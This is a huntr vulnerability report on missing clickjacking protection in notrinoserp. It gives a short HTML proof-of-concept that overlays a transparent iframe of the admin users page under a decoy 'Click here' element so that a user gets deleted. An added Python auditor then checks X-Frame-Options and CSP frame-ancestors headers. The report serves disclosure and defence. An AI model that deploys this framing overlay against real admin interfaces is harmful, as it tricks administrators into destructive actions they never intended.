huntr / akshayravic09yc47 / 61E3BDF7-3548-45EA-B105-967ABC0977F4
History: Aug 21, 2022 - 3:29 p.m.

Clickjacking Leads To User Deletion

2022-08-21 15:29:26
akshayravic09yc47
www.huntr.dev
8

EPSS: 0.001 (Low)
EPSS Percentile: 30.2%

  1. Hello team, on notrinoserp there is no clickjacking protection implemented (X-Frame-Options), so an attacker can perform a clickjacking attack, and in this case I'm able to delete a user account via this vulnerability from the admin account. Here is the PoC:

Exploit Script:

<style>
    iframe {
        position:relative;
        width:1200px;
        height: 650px;
        opacity: 0.4;
        z-index: 2;
    }
    div {
        position:absolute;
        top:183px;
        left:880px;
        z-index: 1;
    }
</style>
<div>Click here</div>
<iframe src="http://127.0.0.1:4445/admin/users.php?"></iframe>

Patch Recommendation:

  1. Add the X-Frame-Options header to prevent clickjacking/UI redressing attacks
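The following is an added example, not code from the huntr report or from the notrinoserp project: a small audit that inspects a raw HTTP response and decides whether it carries effective anti-framing protection, so a defender can verify the recommended fix was actually deployed. It checks both X-Frame-Options (only DENY and SAMEORIGIN count; the obsolete ALLOW-FROM form is ignored by current browsers) and the Content-Security-Policy frame-ancestors directive, which supersedes X-Frame-Options where both are present. All sample responses below are constructed for the example; none were captured from the reported application.

```python
"""Audit HTTP response headers for anti-framing (clickjacking) protection.

Added example; the sample responses are constructed, not captured from
notrinoserp. Parsing uses the standard library's email header parser,
whose header syntax matches HTTP/1.1 closely enough for this purpose.
"""
from email.message import Message
from email.parser import BytesParser

# X-Frame-Options values that browsers honour. ALLOW-FROM is obsolete and
# anything else is invalid, so the audit treats those as no protection.
VALID_XFO = {"DENY", "SAMEORIGIN"}

# Constructed sample responses (labelled as such; not real captures).
UNPROTECTED_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Type: text/html; charset=UTF-8\r\n"
    b"Set-Cookie: PHPSESSID=constructed; path=/\r\n"
    b"\r\n"
    b"<html>admin users page</html>"
)
FIXED_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Type: text/html; charset=UTF-8\r\n"
    b"X-Frame-Options: DENY\r\n"
    b"Content-Security-Policy: default-src 'self'; frame-ancestors 'none'\r\n"
    b"\r\n"
    b"<html>admin users page</html>"
)
XFO_ONLY_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"X-Frame-Options: sameorigin\r\n"
    b"\r\n"
)
OBSOLETE_XFO_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"X-Frame-Options: ALLOW-FROM https://example.com\r\n"
    b"\r\n"
)
WILDCARD_CSP_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Security-Policy: frame-ancestors *\r\n"
    b"\r\n"
)


def parse_response_headers(raw: bytes) -> Message:
    """Split a raw HTTP/1.1 response into status line and headers; return the headers."""
    head = raw.split(b"\r\n\r\n", 1)[0]          # drop the body, if any
    _status_line, _, header_block = head.partition(b"\r\n")
    return BytesParser().parsebytes(header_block)


def frame_ancestors(csp_values):
    """Return the frame-ancestors source list from the CSP header(s), or None if absent."""
    for csp in csp_values:
        for directive in csp.split(";"):
            parts = directive.strip().split()
            if parts and parts[0].lower() == "frame-ancestors":
                # Normalise 'self' / 'none' by stripping the quotes; hosts stay as-is.
                return [p.strip("'").lower() for p in parts[1:]]
    return None


def audit_framing(raw: bytes) -> dict:
    """Return {'protected': bool, 'via': str | None, 'notes': [str]} for one response."""
    msg = parse_response_headers(raw)
    notes = []

    # CSP frame-ancestors takes precedence over X-Frame-Options when present.
    ancestors = frame_ancestors(msg.get_all("Content-Security-Policy", []))
    if ancestors is None:
        notes.append("no Content-Security-Policy frame-ancestors directive")
    elif "*" in ancestors:
        notes.append("frame-ancestors * permits framing from any origin")
    else:
        return {"protected": True, "via": "csp", "notes": notes}

    xfo = [v.strip().upper() for v in msg.get_all("X-Frame-Options", [])]
    if not xfo:
        notes.append("no X-Frame-Options header")
    elif all(v in VALID_XFO for v in xfo):
        return {"protected": True, "via": "x-frame-options", "notes": notes}
    else:
        for v in xfo:
            if v.startswith("ALLOW-FROM"):
                notes.append(f"X-Frame-Options '{v}' uses obsolete ALLOW-FROM; browsers ignore it")
            elif v not in VALID_XFO:
                notes.append(f"X-Frame-Options value '{v}' is not DENY or SAMEORIGIN")
    return {"protected": False, "via": None, "notes": notes}


if __name__ == "__main__":
    for name, sample in [("unprotected", UNPROTECTED_RESPONSE), ("fixed", FIXED_RESPONSE),
                         ("xfo-only", XFO_ONLY_RESPONSE), ("allow-from", OBSOLETE_XFO_RESPONSE),
                         ("wildcard-csp", WILDCARD_CSP_RESPONSE)]:
        print(name, audit_framing(sample))
```

On the server side the corresponding fix is to emit `X-Frame-Options: DENY` (or `SAMEORIGIN` if the application legitimately frames itself) together with `Content-Security-Policy: frame-ancestors 'none'` on every authenticated page, either from the application or from the web server configuration; the audit above then reports `via: "csp"` for such responses. Anti-CSRF tokens on state-changing actions such as user deletion are a complementary control, but they do not stop clickjacking on their own because the framed page carries a valid token.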

